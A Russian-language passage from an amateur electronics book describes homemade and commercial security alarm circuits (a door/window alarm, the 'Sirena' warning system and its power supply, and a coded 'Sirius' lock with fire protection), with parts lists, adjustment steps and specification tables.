Подача сигнала тревоги при открывании двери или окна происходит по двухпроводной линии. В качестве датчиков используются малогабаритные переключатели ТВ2, которые могут быть включены параллельно в одну линию связи, составляющую сигнальный шлейф. В устройстве применено довольно большое количество переключателей и контактных групп, которые управляют автоматикой сигнального блока. Как было отмечено ранее, переключатель S1 предназначен для включения электропитания переменного тока; переключатель S2 включает и выключает питание звонка ВА1. В положении, указанном на схеме, электрический звонок включен и звуковой сигнал будет подан, если сработает автоматика устройства. Двухполюсный переключатель S3 предназначен для общего отключения звуковой и световой сигнализации. Переключатель S4 переводит сигнальное устройство в ждущий режим работы из положения холостого хода. Переключатели S5 и S6 устанавливаются на входных дверях, окнах, форточках, воротах гаражей и т. д., они составляют охранный шлейф и являются конечными выключателями.
При открывании дверей охраняемого объекта контакты 1 и 2 переключателя S5 (или S6) замыкаются и система переходит в рабочий режим тревоги. В положениях контактов всех переключателей, указанных на схеме, сторожевое устройство отключено от сети и находится в нерабочем состоянии. При подаче напряжения переменного тока на вход устройства и при условии, если вся система исправна, а двери закрыты (конечные выключатели S5, S6 разомкнуты), схема находится в дежурном режиме. В это время тиристор VS1 и стабилитрон VD7 закрыты и напряжение па исполнительные устройства не подается. Транзистор VT5 открыт, а на резисторе R10 фиксируется напряжение до 3 В, которого становится достаточно для поддержания в открытом состоянии этого транзистора. На базу транзистора VT6 подается небольшое положительное напряжение.
После замыкания контактов переключателя S5 падение напряжения на резисторе R10 значительно возрастает, что приводит к открыванию стабилитрона VD7 и тиристора VS1. Это, в свою очередь, обеспечивает срабатывание реле К1, контакты которого К1.1 и К1.2 переключаются из открытого состояния в замкнутое. Одновременно срабатывает световая и звуковая сигнализация, которые продолжают работать и после того, как контакты 1 и 2 переключателя S5 будут вновь разомкнуты, то есть дверь будет снова закрыта.
При изготовлении электронного блока устройства необходимо предусмотреть возможность размещения ручек управления, кнопок переключателей и индикаторных ламп на лицевой панели. Электрический звонок и сигнальная лампа могут быть расположены на значительном расстоянии от пульта управления и установлены вне охраняемого помещения. При этом параллельно могут быть установлены несколько таких сигнализаторов в разных местах. Электропитание их осуществляется по двухпроводным линиям, выполненным изолированным проводом.
Для изготовления сторожевого устройства применены следующие покупные комплектующие ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания Т1 типа ТА62-127/220-50;
транзисторы VT1 типа ГТ308В, VT2 — КТ315Б, VT3 — КТ814Б, VT4 — КТ315Б, VT5 — КТ603Б, VT6 — КТ603Б; выпрямительные диоды VD1—VD4 типа Д223, VD6 — Д224, VD8 — Д223, VD9 — Д223; стабилитроны VD5 типа Д814Д, VD7 — КС156А;
тиристор VS1 типа КУ102А; конденсаторы С1 типа К40У-9-630В-0.033 мкФ, С2 — К50-12-25В-500 мкФ, СЗ — К50-12-25В-20 мкф, С4 — К50-12-25В-100 мкФ, С5 — К50-12-25В-5 мкФ; резисторы R1 типа МЛТ-0,125-300 кОм, R2 — МЛТ-0,25-100 Ом, R3 — МЛТ-0,25-1,8 кОм, R4 — МЛТ-0,25-5,1 кОм, R5 — СПЗ-4аМ-А-0,25Вт-3,3 кОм, R6 — МЛТ-0,25-2 кОм, R7 — МЛТ-0,125-560 кОм, R8 — МЛТ-2-100 Ом, R9 — МЛТ-0,25-6,8 кОм, R10 — МЛТ-0,25-1 кОм, R11 — МЛТ-0,25-3,6 кОм, R12 — МЛТ-0,5-9,1 кОм, R 13 — МЛТ-0,5-1 кОм, R14 — МЛТ-0,5-68 кОм, RI5 — МЛТ-0,25-68 кОм, R16 — МЛТ-2-39 кОм; сигнальные лампы H1 типа ТН-30-3, Н2 — СМ37; электромагнитное реле К1 типа РЭС-9 (паспорт РС4.524.200); электрический звонок постоянного тока ВА1 напряжением питания до 24 В; электрические соединители X1 типа «вилка», Х2, ХЗ — КМЗ-1; переключатели S1 типа ТВ2-1-2, S2 — П1Т-1-1, S3 — МТЗ-1 (П2Т-1-1), S4 — ТВ2-1-2,S5 — ТВ2-1-2, S6 — ТВ2-1-2; предохранитель F1 типа ПМ1 1-0,25 А.
При изготовлении и регулировке сторожевого устройства можно использовать другие ЭРИ и ЭРЭ, аналогичные примененным и не ухудшающие основные электрические параметры и эксплуатационные характеристики. Например, сетевой понижающий трансформатор типа ТА можно заменить на трансформатор типа ТС-50-5 или трансформатор самодельной конструкции; выпрямительные диоды типа Д223, входящие в мостовой выпрямитель, можно заменить диодной сборкой типа КЦ или на выпрямительные диоды, рассчитанные на выпрямленный ток не менее 50 мА и обратное напряжение не ниже 50 В; транзисторы КТ315Б могут быть заменены транзисторами этой же серии с буквенными индексами В, Г, Е; резисторы типа МЛТ можно заменить на резисторы типов МТ, ВС, ВСа, ОМЛТ, УЛИ, БП, C1-4, C2-8; конденсаторы типа К50-12 — на К50-3, К50-6, К50-16, К50-20; транзисторы типа КТ603Б — на КТ605, П307, П308, П309 с любыми буквенными индексами; тиристор типа КУ102А — на КУ101 или КУ102 с любыми буквенными индексами. Для переключения рабочих состояний устройства вместо указанных выше могут быть применены переключатели типа П2К с фиксированным положением кнопки.
Регулировку сторожевого устройства начинают с проверки источника электропитания, устанавливая в него заведомо исправные и качественные ЭРИ и ЭРЭ. Сначала проверяется действующее напряжение на выходных обмотках сетевого трансформатора, далее — на выходе выпрямительного моста и затем в точках А и Б — на выходе стабилизатора напряжения. При проверке БП нагрузка в точках А и Б отключается и вместо нее к выходу подключается проволочный постоянный резистор типа ПЭВ (С5-35В) сопротивлением 250 Ом и мощностью 5 Вт. Подстроечным переменным резистором R5 устанавливается на этом резисторе постоянное напряжение 16 В. Затем нужно подключить осциллограф, и подбором резистора R7 добиваются минимальной амплитуды пульсации постоянного тока. Ток нагрузки должен быть не более 2 А. После этого подключается нагрузка и проверяется электронный блок при выключенных контактах переключателей. Сначала подбором сопротивления резистора R12 устанавливают на эмиттере транзистора VT6 напряжение 3 В, при этом на транзисторе V15 должно быть напряжение 0,5 В и он должен быть открыт.
Далее контакты 1 и 2 переключателя S7 замыкаются, то есть устройство переводится в положение «включено». При этом напряжение на стабилитроне VD7 относительно «земли» должно равняться 24 В. Тиристор и этот стабилитрон находятся в открытом состоянии, и, следовательно, индикаторная лампа Н2 должна светиться.
Основные электрические параметры
и технические характеристики сторожевого устройства на ППП
со световой и звуковой сигнализацией
Номинальное напряжение питающей сети
переменного тока, В .......... ....... 220 или 127
Номинальная частота питающей сети
переменного тока, Гц ................... 50
Номинальное напряжение автономного источника
питания постоянного тока, подключаемого
к системе в точках А и Б, В ............... 24
Пределы изменения напряжения питающей сети
переменного тока, %.................... —10...+10
Пределы изменения частоты питающей сети
переменного тока, %.................... 1
Пределы изменения напряжения автономного
источника питания постоянного тока, В ....... 20...24
Напряжение переменного тока на выводах
сетевого трансформатора Т1, В
11 и 12 ........................... 56
13 и 14 ........................... 56
15 и 16 .......................... 40
17 и 18 ........................... 40
19 и 20 ........................... 12
21 и 22 ........................... 10
Стабилизированное напряжение на выходе в точках
А и К, В ............................ 22
Амплитуда пульсации выпрямленного напряжения,
мВ, не более ......................... 16
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более ............. 12
Коэффициент стабилизации напряжения питающей
сети, не менее ........................ 200
Максимальное сопротивление шлейфа, кОм ...... 3
Количество одновременно охраняемых объектов, шт . . 1...10 Сопротивление изоляции токоведущих проводников
относительно металлических частей устройства,
МОм,не менее ....................... 10
Ток, потребляемый устройством в дежурном режиме
работы, мА, не более ................... 7
Общая максимальная мощность устройства, Вт .... 36 Мощность потребляемая устройством в дежурном
режиме работы,мВт .................... 150
Помехозащищенность устройства при воздействии внешнего электромагнитного поля, дБ, не менее . . 100 Срок службы, ч, не менее .................. 10 000
Вероятность безотказной работы при риске заказчика в=0,92, не менее ............... 0,96
кпд, %,не менее ........................ 95
Условия эксплуатации:
температура окружающей среды, °С ........ —25...-+-40
относительная влажность воздухапри температуре25 С %, не более ................... 85
атмосферное давление воздуха, мм рт. ст. ..... 200...900
Рис. 3.9. Принципиальная схема сторожевого устройства на ППП со световой и звуковой сигнализацией.
3. 6. СИСТЕМА ПРЕДУПРЕДИТЕЛЬНОЙ СИГНАЛИЗАЦИИ
Электронная автоматическая система промышленного изготовления типа «Сирена» предназначена для подачи сигнала тревоги при проникновении на охраняемые объекты посторонних лиц и при срабатывании установленных на объектах специальных датчиков, выполняющих роль конечных выключателей. Рассматриваемое устройство имеет универсальное применение, так как рассчитано на использование во всех климатических зонах страны для охраны как стационарных, так и подвижных объектов.
Наилучшие результаты при применении устройства предупредительной сигнализации типа «Сирена» можно получить, если использовать его в комплексных системах охраны и оповещения совместно с другими электронными и электромеханическими устройствами, и особенно при охране стационарных объектов.
Примерная схема размещения датчиков в контрольных точках охраняемых объектов приведена на рис. 3. 10. Электрическая схема, включающая комплект блоков и самостоятельных узлов, которые образуют систему, предусматривает возможность подключения к соответствующим клеммам не менее четырех датчиков. С их помощью осуществляется наблюдение и охрана как помещения в целом, так и отдельных его частей или нескольких близко расположенных объектов одновременно.
В схеме, приведенной на рис. 3. 10, приняты следующие обозначения; светодиод VD1 типа АЛ307Б; датчики Д1— Д4, конструкции которых даны в главе 3. 2; однополюсный переключатель S1 типа «тумблер»; перемычка X1 прово-
Рис. 3. 10. Схема размещения датчиков в контрольных точках охраняемых объектов.
лочная , блок громкоговорителей (БГ); БЭ; сигнальная лампа H1.
Работает система предупредительной сигнализации, как правило, в автономном режиме, от восьми последовательно соединенных элементов типа 373, устанавливаемых в специальный отсек БП. Данная система сигнализации может быть легко переведена на электропитание от сети переменного тока напряжением 220 В частотой 50Гц. Для этого необходимо использовать покупной или самодельный блок электропитания с выходным стабилизированным напряжением 10...12 В и током нагрузки не менее 500мА, принципиальная электрическая схема которого приведена на рис. 3.11. Подключается БП к клеммам 4 и 6 электронного блока системы.
Следует сказать, что в соответствии с рекомендациями завода-изготовителя допускается использовать в качестве встроенного источника электропитания элементы, приведенные в табл. 3.1, или аккумуляторы типа НКТЦ-35-1, а также другие аналогичные им по техническим характеристикам и размерам. Хорошие результаты дает применение аккумуляторной батареи типа 8НКГ-10Г, которая сохраняет работоспособность в очень жестких условиях эксплуатации и обладает повышенными техническими характеристиками, надежностью и долговечностью.
С целью сохранения секретности промышленных изделии данной системы БЭ при установке на место не вскрывается и весь электромонтаж производится наружными соединениями к контактам, выведенным на лицевую панель БЭ. При этом принцип работы БЭ сторожевого устройства не поддается определению из-за отсутствия принципиальной и монтажной электрических схем. И как указывалось ранее, из-за отсутствия комплекта КД эти изделия не могут быть отремонтированы в домашней лаборатории.
Конструктивно основной электронный блок сторожевого устройства выполнен в виде прямоугольного пластмассового корпуса, который имеет габаритные размеры, не превышающие 185Х110Х70 мм. Размеры сетевого блока электропитания определяются в основном конструкцией примененного в ней понижающего трансформатора питания Т1 и не превышают следующих данных 120Х80Х70 мм. На лицевой панели БЭ установлены все основные органы управления и контактные клеммы, которые служат для подключения к ним монтажных проводников, идущих от датчиков. Эти клеммы имеют соответствующие обозначения.
К контактам 2 и 3 подключается скрытно устанавливаемый выключатель S1. Он должен быть недоступен посторонним лицам. Внешний источник питания, работающий автономно или от сети переменного тока, подключается к клеммам 4 и б (4 и 5). При этом на клемму 4 подается напряжение постоянного тока с положительного (плюсового) контакта, а на клемму б — с отрицательного (минусового). На выходных клеммах 1 и 2 действует напряжение питания со знаком «+» так же, как и на клеммах 4. К клеммам 5 и 10 подключается обрывной шлейф, выполненный из тонкого медного провода. К клеммам 13 и 14 — сирена или блок громкоговорителей. Шлейф-датчик подключается к клемме 10 (+) и к одному из минусовых выводов.
На лицевой панели БП устанавливаются ручки управления, держатели предохранителей, выходные клеммы и индикаторная лампа H1, а также светодиод VD2. Элементы БП собираются на печатной плате, изготавливаемой из фольгированного стеклотекстолита толщиной до 2 мм. Как видно из принципиальной схемы (рис. 3.11), БП включает в свой состав входные питающие цепи, сетевой понижающий трансформатор Т1, выпрямительное устройство, собранное на полупроводниковых диодах и электролитических конденсаторах, стабилизатор напряжения и выходные цепи.
Подключение БП к сети переменного тока осуществляется с помощью электрического соединителя X1 типа «вилка» к унифицированной розетке. Общее включение электропитания обеспечивается переключателем S1 типа «тумблер». Предохранители F1 и F2 защищают входные цепи БП от коротких замыканий и перегрузок.
На входе БП собран световой сигнализатор изменения сетевого напряжения на светодиоде VD2 и световой сигнализатор о подаче напряжения на сторожевое устройство на лампе H1 Первый сигнализатор работает только в том случае, если напряжение переменного тока превысит значение 235...240 В, в этом случае светодиод начинает светиться в мигающем режиме. Лампа накаливания H1 работает постоянно, пока замкнуты контакты переключателя S1. Ее равномерное свечение свидетельствует о том, что напряжение сети находится в пределах номинальных значений и на выходных обмотках трансформатора действует расчетное напряжение. Первый сигнализатор начнет работать в мигающем режиме только в том случае, если напряжение питающей сети превысит номинальное значение. Основой этого сигнализатора является динистор VS1, который срабатывает в следующем порядке. После замыкания контактов переключателя S1 сетевое напряжение поступает на однополупериодный выпрямитель, собранный на полупроводниковом диоде VD1, выпрямляется и подается через резистор R1 на ДН. С движка переменного резистора R2 часть напряжения поступает на электролитический конденсатор С1, который начинает заряжаться. До тех пор, пока напряжение на этом конденсаторе не достигнет напряжения пробоя динистора, последний находится в закрытом состоянии. В момент достижения повышенного значения напряжения динистор пробивается и конденсатор С1 разряжается через него и последовательно соединенные с ним резистор R4 и светодиод VD2, который вспыхивает. Затем конденсатор опять заряжается, после чего процесс повторяется снова. Так происходит постоянно до тех пор, пока напряжение в сети не снизится до предельных оптимальных значений. Работает этот сигнализатор в независимом режиме.
Блок питания подключается к БЭ электрическими соединителями Х2 и ХЗ. При этом соединитель Х2 подключается к клеммам 5 или 6, а ХЗ — к клемме 4 электронного блока. Здесь необходимо сделать предупреждение. БП, выполненный в металлическом корпусе, не должен иметь гальванической связи с системой предупредительной сигнализации, так как его корпус может иметь положительный потенциал.
В БП применен унифицированный сетевой трансформатор питания серии «Габарит», который рассчитан на подключение к сети переменного тока напряжением 127 или 220 В частотой 50 Гц. Вместо покупного трансформатора может быть применен самодельный трансформатор, который изготавливается на броневом магнитопроводе типа Ш или ШЛ (ШЛМ). Особое внимание следует обратить на сопротивление изоляции между витками обмоток трансформатора и магнитопроводом. Чем выше сопротивление, тем больше электрическая прочность и тем надежнее эксплуатация такого трансформатора. В домашней мастерской это достигается довольно простым способом. При рядовой намотке каждый слой провода покрывается нитролаком и высушивается в течение 2 ч. Между слоями обмотки прокладывается слой конденсаторной бумаги, который также покрывается изоляционным лаком. Каждая обмотка трансформатора, в том числе и экранная, должна быть также разделена слоем изоляционного материала, но с большим коэффициентом магнитной проницаемости. Очень хорошие результаты можно получить, если после полного изготовления весь трансформатор залить в форму эпоксидной смолой. Перед этой операцией выводные клеммы должны быть облужены припоем марки ПОС-60.
Сетевой понижающий трансформатор TI обеспечивает заданное выходное напряжение, поступающее на выпрямитель, полную гальваническую развязку входных цепей и сети переменного тока от вторичных электрических цепей схемы и достаточную электробезопасность при настройке и ремонте устройства предупредительной сигнализации.
Трансформатор Т1 имеет одну катушку, установленную на центральном стержне магнитопровода с активной площадью поперечного сечения стали не менее 6 см2. Моточные данные сетевого понижающего трансформатора питания самодельной конструкции приведены в табл. 3.12. На выходных обмотках трансформатора действует переменное напряжение 12 В при номинальной нагрузке.
Таблица 3.12. Моточные данные сетевого понижающего трансформатора питания T1, примененного в системе предупредительной сигнализации
Выпрямитель собран на четырех полупроводниковых диодах VD3—VD6 по однофазной двухполупериодной мостовой схеме, которая характеризуется высокими электрическими параметрами. На выходе выпрямителя действует постоянный ток с повышенной частотой пульсации. Выпрямитель имеет высокий кпд, удобен для электрического монтажа, не требует предохранительных прокладок при установке, защищает включенные в него полупроводниковые диоды от механических повреждений, на них действует пониженное обратное напряжение, и сама схема позволяет полнее использовать имеющуюся габаритную мощность сетевого трансформатора.
Выпрямленное напряжение постоянного тока 12...15 В поступает на компенсационный стабилизатор напряжения, собранный на транзисторах VT1—VT3. В качестве РЭ применен мощный транзистор VT1. Ток ограничения определяется величиной сопротивления резистора R8. При сборке и монтаже стабилизатора необходимо выполнить условие, при котором суммарное напряжение стабилизации в цепях полупроводниковых стабилитронов было бы равно примерно 11...12 В. Здесь необходимо учитывать также, что при увеличении тока нагрузки напряжение на входе стабилизатора уменьшается: и тем больше, если меньше габаритная мощность трансформатора.
При изготовлении БП и установке системы сигнализации на конкретном объекте используются следующие покупные комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа КТ803А, V'Т2 — КТ815В, VТ3-КT814B; выпрямительные диоды VD1 типа Д226Б, VD3-VD6—105А; стабилитроны VD7 типа Д815Д, VD8 — Д815Д, VD9 - Д814Д, VD10 — Д814Д, VD11 Д815Д; динистор VS1 типа КН102Д; конденсаторы С1 типа К73-11-1608-0,033 мкФ, С2 — К50-6-25В-4000 мкФ, СЗ — К.10-7В-25В-П33-100 нФ, С4 — К50-6-25В-6.8 мкФ; резисторы RI типа ВСа-0,5-47 кОм, R2 — СП4-2Ма-0,5Вт-100 кОм, R3 — ВСа-0,5-10 кОм, R4 — ВСа-0,25-10 Ом, R5 — ВСа-0,25-110 Ом, R6 — ВСа-0,5-680 Ом, R7 — ВСа-0,5 330 Ом, R8 — ВСа-0,5-2,7 кОм, R9 — ВСа-0,25-2,7 кОм, R 10 — СП4-2Ма-1Вт-1 кОм;
электрические соединители X1 типа <<вилка», Х2, ХЗ — КМЗ-1;
светодиод VD2 типа АЛ107Б; предохранители плавкие F1, F2 типа ПМ 1-0,5 A, F3 — ПМ 1-0,25 А; переключатель двухполюсный S1 типа П2Т-1-1; сигнальная лампа H1 типа МН- 6.3-0,22 A.
Система предупредительной сигнализации дает возможность подключить к ней дополнительно индикаторную лампу, работающую постоянно в мигающем режиме, аккумулятор автомобильного типа и звуковую сирену типа С205-6. Схема подключения этих устройств приведена на рис. 3.12. При монтаже дополнительных устройств применены следующие комплектующие ЭРЭ: транзисторы VT1 типа КТ315Б, VT2 — КТ819А; электромагнитное реле К7 типа РЭН-34 (паспорт ХП4.500.030-01); сирена ВА1 типа С205-6; аккумуляторная батарея GB1 с напряжением постоянного тока 12 В.
В качестве датчиков, устанавливаемых на дверях, окнах, капотах, воротах и т. д., применяются малогабаритные переключатели типа КМ1-1, выключатели типа МТ-1, переключатели типа П2К. Для монтажа используется провод марки МГШВ с площадью поперечного сечения по меди от 0,2 до 0,4 мм2.
Схемы подключения датчиков и дополнительных устройств приведены на рис. 3.10 и 3.12. Необходимо отметить, что к контактам 1 и 5 или 1 и 6 подключается датчик, устанавливаемый на входных дверях, так как система обеспечивает при этом задержку на выдачу звукового сигнала на 10 с. Этого времени хватает на то, чтобы отключить систему от питания при входе в помещение или охраняемый объект выключателем S1, скрытно установленным в укромном месте, что позволяет избежать подачи сигнала тревоги. К контактам 7 или 9, 5 или 6
Рис. 3.12. Схема подключения звуковой сирены к электронному блоку системы предупредительной сигнализации.
подключаются датчики, устанавливаемые на окнах, форточках, внутренних дверях и других открывающихся объектах, когда необходимо подать сигнал тревоги немедленно.
К контактам 10 и 5 или 10 и 6 подключаются проводники шлейфа, уложенного по периметру охраняемого помещения или территории. Проводники шлейфа могут быть наклеены на стекла окон. Шлейф выполняется из тонкого провода, металлической фольги или комбинированного токопроводящего материала. Обрыв проводников шлейфа приводит к мгновенному срабатыванию системы. При указанном включении шлейфа бывают случаи ложного срабатывания. Для предотвращения ложных срабатываний тогда, когда не применяется в качестве датчика шлейф, необходимо установить перемычки, замыкающие все три выходных контакта 5, 6 и 10 между собой.
К контактам 13 и 14 подключается акустическое устройство, входящее в комплект поставки системы. Как правило, на охраняемом объекте устанавливается один датчик на входной двери Д3 (см. рис. 3.10) и могут быть установлены параллельно друг другу датчики Д1, Д2 в количестве до 24 шт. При подключении датчика-шлейфа Д4 между контактами 6 и 10 не должно быть металлической перемычки. Установка датчиков в автомобиле и подключение системы предупредительной сигнализации типа «Сирена» к аккумулятору изложены в руководстве по эксплуатации.
Правильно собранная охранная сигнальная система в дополнительной наладке и регулировке не нуждается. Однако при сборке и монтаже элементов БП необходимо:
проверить выходное напряжение на вторичных обмотках сетевого трансформатора, поступающее на выпрямитель в режиме холостого хода; оно должно быть равно 12...13 В;
проверить вольтметром выпрямленное напряжение постоянного тока в контрольных точках А и Б как в режиме ожидания, так и под нагрузкой при подаче звукового и светового сигналов;
проверить выходное стабилизированное напряжение постоянного тока на электрических соединителях Х2 и ХЗ (см. рис. 3.9), которое должно быть равно 12 В под нагрузкой и до 14 В в режиме холостого хода.
В блоках системы можно применить другие комплектующие ЭРЭ, аналогичные по своим техническим характеристикам использованным. Так конденсаторы типа К50-3 можно заменить на конденсаторы типов К50-6, К50-12, К50-16, К50-20; резисторы типа ВСа — на ВС, МТ, МЛТ, ОМЛТ, С1-4; транзисторы типа КТ803А — на КТ819Б—КТ819Г; диод Д226Д — на КД102Б, Д237А, диоды типа Д105А — на Д226, Д237Б, КД105Б; могут быть применены также переключатели типа П2К.
Основные электрические параметры
и технические характеристики
системы предупредительной сигнализации типа «Сирена»
Номинальное напряжение питающей сети
переменного тока, В ..................... 220
Номинальное напряжение автономного источника
питания, В ......................... 12
Номинальная частота питающей сети
переменного тока, Гц ................... 50
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более ............. 12
Пределы изменения напряжения питающей сети
переменного тока, при которых сохраняется
устойчивая работа системы, В ............. 187...242
Пределы изменения напряжения автономного
источника питания, В ................... 9...14
Пределы изменения частоты питающей сети
переменного тока, Гц ................... 49...51
Максимальный ток нагрузки при питании от
автономного источника постоянного тока, мА . . . 500
Амплитуда пульсации выпрямленного напряжения, В,
не более ............................ 0,3
Коэффициент стабилизации напряжения постоянного
тока автономного источника электропитания,
не менее ............................ 300
Ток, потребляемый системой предупредительной
сигнализации в режиме холостого хода, мА,
не более ............................ 5
Уровень звукового давления сигнала тревоги
на расстоянии 1 м от источника. дБ . ....... 100
Koличество устанавливаемых на охраняемых на объекте
датчиков,шт ............... ....... 24
Длина шлейфа ,не менее ................. 100
Cопротивление шлейфа, кОм, не более ......... 5
Время срабатывания устройства при обрыве
шлейфа, мс, не более .................... 0,1
Время срабатывания устройства при размыкании
контактов датчиков, с, не менее ............. 2
Длительность звучания сигнала тревоги
после срабатывания системы, с, не менее ...... 500
Диаметр центральной жилы монтажного провода
в изоляции, соединяющего датчики с БЭ
устройства, мм, не менее ................. 0,2
Срок службы, ч, не менее .................. 5000
Срок гарантии, мес ...................... 24
Вероятность безотказной работы системы при риске
заказчика в=0,92, не менее ................ 0,95
Сопротивление изоляции токопроводящих частей
системы, МОм, не менее ................. 5
Условия эксплуатации:
температура окружающей среды, °С ........ —40...+45
относительная влажность воздуха при температуре 25 °С, %, не более ....... 85±3
атмосферное давление воздуха, мм рт. ст. ..... 200...900
Рис. 3. 11. Принципиальная схема блока питания сторожевого устройства.
3. 7. УНИВЕРСАЛЬНОЕ ЭЛЕКТРОННОЕ СТОРОЖЕВОЕ УСТРОЙСТВО СИСТЕМЫ «СИРИУС»
Универсальное сторожевое устройство состоит из сигнального устройства, БП с защитой, шифратора, дешифратора и ИМ. Устройство разработано для охраны помещений от пожара и несанкционированного открывания дверей, но использовать его целесообразно вместе с другими сторожевыми устройствами, которые имеют в своем составе звуковую и световую сигнализацию.
Электронное сторожевое устройство, собранное на ППП и трех ИМС, предназначено для установки в жилых домах и в хозяйственных помещениях для запирания дверей и отключения электропитания при повышении температуры окружающей среды выше установленной величины. Сторожевое устройство выполняет функции охраны без какой-либо сигнализации, является электронным прибором, в котором невозможно прослушать ход и порядок набора шифра и который внешне не реагирует на правильно или неправильно набранные промежуточные цифры шифра, а срабатывает исключительно после всего правильно набранного шифра. Важной особенностью данного устройства является то, что при наборе неправильной цифры время его срабатывания на открывание дверей постоянно увеличивается и даже правильно набранный шифр не дает команду на ИМ.
Сторожевое устройство может быть с успехом использовано как в городе, так и в сельской местности. Оно рассчитано на эксплуатацию в различных климатических районах страны, в условиях М, УХЛ и ХЛ. Устойчивую работу при температуре окружающей среды от —20 до 40 °С и относительной влажности до 90% при температуре 22 °С можно гарантировать, если для сборки и монтажа применены заведомо качественные комплектующие ЭРИ и ЭРЭ и правильно выполнены основные технологические операции сборки и монтажа.
Устройство может найти применение для охраны стационарных объектов на садово-огородных и приусадебных участках: домов, гаражей, хозблоков и т. д. Работает устройство от сети переменного тока напряжением 220 В частотой 50 Гц в постоянном режиме включения, о чем свидетельствует свечение неоновой лампы H1. Индикаторный светодиод вспыхивает только при правильно набранной девятой цифре шифра, набор которого осуществляется двумя рядом расположенными кнопочными переключателями, не имеющими фиксированного положения при замыкании контактов.
Принципиальная электрическая схема универсального сторожевого устройства приведена на рис. 3. 13. В полной зависимости от примененного в устройстве ИМ и напряжения его питания, которое определяет конструктивное исполнение, находится инженерное решение и техническое исполнение механической части замка, поэтому в схему могут быть внесены непринципиальные изменения. Так, если ИМ работает от источника постоянного тока, то из схемы исключаются входные и защитные цепи, и устройство может быть выполнено более компактным, но с несколько меньшими функциональными возможностями. Применение ИМ, работающего от сети переменного тока напряжением 220 В, делает сторожевое устройство более универсальным, в котором можно применять большое количество промышленных изделий: электромагнитов, соленоидов, электромагнитных реле и т. д.
Электронное сторожевое устройство отличается oт других устройств подобного назначения также тем, что оно работает непосредственно от сети переменного тока и не имеет в своем составе понижающего сетевого трансформатора питания, и, следовательно, схема сторожевого устройства не имеет трансформаторной гальванической развязки во входных цепях. Однако для гальванической развязки первичных цепей и электрической цепи защиты от схемы счетно-решающего устройства применен оптрон DU1, который одновременно служит устройством, повышающим электробезопасность всего РЭУ.
Как следует из схемы, сторожевое устройство включает в свой состав входные цепи питания, противопожарное охранное устройство, выпрямитель постоянного тока, емкостный фильтр, ПСН, счетно-решающее устройство, ИМ и выходные цепи.
Подключение электронного сторожевого устройства к сети переменного тока происходит с помощью стандартных электрического соединителя X1 типа «вилка» и штепсельной розетки. Предохранители F1 и F2 защищают входные цепи от коротких замыканий и перегрузок, они рассчитаны на ток максимальной перегрузки 1 А. Включение устройства в эксплуатацию осуществляется с помощью кнопочного или перекидного однополюсного переключателя S1.
Одним из основных блоков электронного устройства является устройство защиты от повышения температуры как окружающей среды в охраняемом помещении, так и от перегрева элементов электронной схемы, находящихся постоянно под напряжением высокого переменного тока. От этого зависит выбор места установки термодатчика. В данном случае при повышении температуры окружающей среды и температуры, действующей на термодатчик, предусмотрено отключение сторожевого устройства от сети переменного тока.
Устройство защиты применяется в многообразных вариантах во многих конструктивных исполнениях, в силу своей простоты не имеет принципиальной новизны, но достаточно эффективно работает с разными типами датчиков и в различных условиях эксплуатации.
В качестве главного элемента устройства защиты от пожара в данном случае использован маломощный транзистор VТ1, который является очень чувствительным датчиком температуры. Работает термодатчик по принципу увеличения обратного тока эмиттера при повышении температуры окружающей среды. Датчиками температуры могут служить полупроводниковые диоды и термосопротивления.
В рассматриваемом сторожевом устройстве в качестве термодатчика выбран транзистор типа П416, устойчивая работа которого обеспечивается при температуре от —25 до 125 °С. Транзистор устанавливается снаружи корпуса сторожевого устройства выводами внутрь корпуса и на дюралюминиевой пластине, которая имеет размеры не менее 45х45 мм и толщину до 3 мм. Однако может быть применена и другая конструкция установки и крепления этого транзистора, но во всех случаях термодатчик должен устанавливаться в наиболее пожароопасном месте, а корпус транзистора должен быть всегда открыт.
Изменение тока транзистора VT1 контролируется электронной схемой защиты, в которой предусмотрен разрыв цепи питания сторожевого устройства от сети переменного тока при достижении установленного порогового значения тока транзисторного датчика.
Напряжение переменного тока после замыкания контактов переключателя S1 поступает через цепочку гасящего конденсатора С1 на выпрямитель, собранный на полупроводниковых диодах VD1 и VD2 и далее на сдвоенный стабилизатор напряжения параметрического типа, выполненный на стабилитронах VD4 и VD3, резисторе R1 и конденсаторе С2. Выбранный метод электропитания защитного устройства обеспечивает его устойчивую и надежную работу при минимальном количестве использованных элементов. Подстроечный резистор R3 служит для установления температурного режима срабатывания защиты, который может изменяться в очень широких пределах.
Работает система охраны следующим образом. В тот момент, когда температура окружающей среды и термодатчика достигнет установленного максимума, ток транзистора будет равен пороговому значению. Этот ток при ведет к открыванию транзистора VT2, находящегося в инверсном включении, и через диод VD5 он откроет тиристор VS1. А это в свою очередь приведет к тому, что
обе линии питающей сети переменного тока будут замкнуты между собой через цепочку: предохранитель F2, гасящий десятиваттный резистор R6 сопротивлением 100м и открытый тиристор VS1. Естественно, в этом случае предохранитель F2 мгновенно перегорает и отключает всю систему от сети переменного тока. Заметим, что термодатчик включен в цепь базы управляющего транзистора VT2, а в переход база — эмиттер включен резистор R4, позволяющий регулировать интервал температуры срабатывания устройства. При включении электропитания и подачи напряжения на элементы схемы загорается индикаторная неоновая лампа H1.
Независимо от работы защитного устройства после включения электропитания начинает действовать счетно-решающий блок. Он выполняет одну из функций сторожевого устройства и собран на транзисторах, оптроне, трех ИМС и других ППП. Сначала переменный ток питающей сети поступает на выпрямитель, собранный на четырех диодах по однофазной двухполупериодной мостовой схеме VD6—VD9, а затем сглаживается параметрическим стабилизатором, выполненным на стабилитроне VD10, последовательно с которым включены резисторы R7 и R8. Емкостный фильтр, сглаживающий пульсации постоянного тока, собран на электролитическом конденсаторе СЗ. На выходе стабилизатора действует постоянное стабилизированное напряжение 9 В.
Принцип действия счетно-решающего устройства состоит в следующем. Сначала, в подготовительный период, устанавливается произвольный шифр, состоящий из 9 знаков, расположенных последовательно в произвольном порядке и введенных в память счетно-решающего устройства. На заключительном этапе на дешифраторе, состоящем из двух переключателей S2 и S3, последовательно набираются эти 9 знаков, расположенных в том же порядке. Если весь набор произведен правильно, то после набора последнего знака дается команда на срабатывание ИМ, работающего на постоянном токе. После последнего правильно набранного знака срабатывает тиристор VS1, управляемый оптроном DU1.
